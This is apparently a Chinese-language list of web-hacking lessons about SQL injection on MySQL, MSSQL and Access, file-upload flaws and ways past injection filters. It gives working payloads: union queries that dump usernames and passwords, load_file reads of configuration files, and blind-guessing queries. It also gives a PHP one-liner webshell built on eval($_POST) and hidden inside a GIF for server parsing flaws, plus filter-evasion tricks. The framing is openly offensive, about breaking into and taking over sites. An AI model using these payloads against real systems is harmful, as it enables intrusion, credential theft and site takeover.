大连,网络安全,信息安全,防黑客,SEO,搜索引擎优化,网站防黑,网站被黑处理,系统安全,企业安全,信息技术,web开发,数据库,网络技术,windows,linux,网站建设 就找QQ:48011203

第20课Mysql注入root不能into outfile拿站

这个可能性太多了。不解释

第19课mysql手工注入之load_file()应用

读取配置文件用的。

and 0 union select 1,2,3,4,5,load_file(0xaaaaaaaaaa)


详细路径必须要用16进制转换一下。

第18课谈谈旁注入侵

就是一个服务器上好几个网站,日了一个跳到另外一个里。

第17课mysql高级暴库拿站

  • 简介:

  • 一.基础知识
    1.MYSQL的版本
    4.0以下,4.0以上,5.0以上。
    4.0以下不支持union查询
    4.0以上magic_quotes_gpc默认为on
    5.0以上可以暴表暴列,支持跨库
    information_schema
    2.magic_quotes_gpc=on
    当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 ' (单引号), " (双引号), \(反斜线) and 空字符会自动转为含有反斜线的转义字符。例如'会变成\'。给注入带来不少的阻碍。

    3.注释符
    Mysql有3种注...

第16课讲解mssql手工差异备份和log备份

哦,跟上面的重复了。

第14课Access偏移注入

用的不多。贴上资料,大家看看吧

http://www.myhack58.com/Article/html/3/7/2009/22579.htm

第13课 搜索型注入

a%' and 1=1-- 正常
a%' and 1=2-- 错误


无非就是对前面的%封闭,然后--注释掉后面的。其实跟POST注入差不多。

第12课手工注入之半猜解查询

and 1=(select top 1 count(*) from admin where Asc(mid (username,1))=97)这种的。还有left、right神马的。

参考一下吧

http://hi.baidu.com/yjppudydvncilte/item/185019d4ab2ed0e8ca0c3922

第11课手工注入之联合查询

and 0 union select 1,2,3,user(),version(),database(),7,concat(username,0x3a,password)   

应该是这种的吧。

第9课制作图片一句话iis7解析漏洞利用

copy复制

1、准备php一句话或者可执行脚本一个。
2、准备图片一张。

a.gif正常图片 1.php一句话木马<?php fputs(fopen('./a.php',"w"),"<?php eval(\$_POST[a]);?>")?>

使用copy命令
copy a.gif/b+1.php/b c.gif

得到图片木马c.gif


剩下的自己看看吧。

不只IIS7,NGINX 1.0以下的也可以。

http://wenku.baidu.com/link?url=L1r_jge8kKnV8ldUyzi-QbZot...

第8课上传漏洞利用方法及突破上传

这个上传漏洞其实也结合了很多的程序系统(动易、良精),没有那么完美的万能上传。


当你遇到一个新的程序,可以使用nc截断上传(当然了现在全用burpsuite了)。IIS6、IIS7、APACHE、NGINX解析漏洞试一试。

第7课突破防注入系统

常见的突破手段   

1、大小写混杂   uNiOn

2、/*!select*/

3、GET POST数据变成COOKIE传递

4、某些过狗注入、不过现在早已经失效了   a%nd 1=2

5、SQLMAP的一些tamper插件。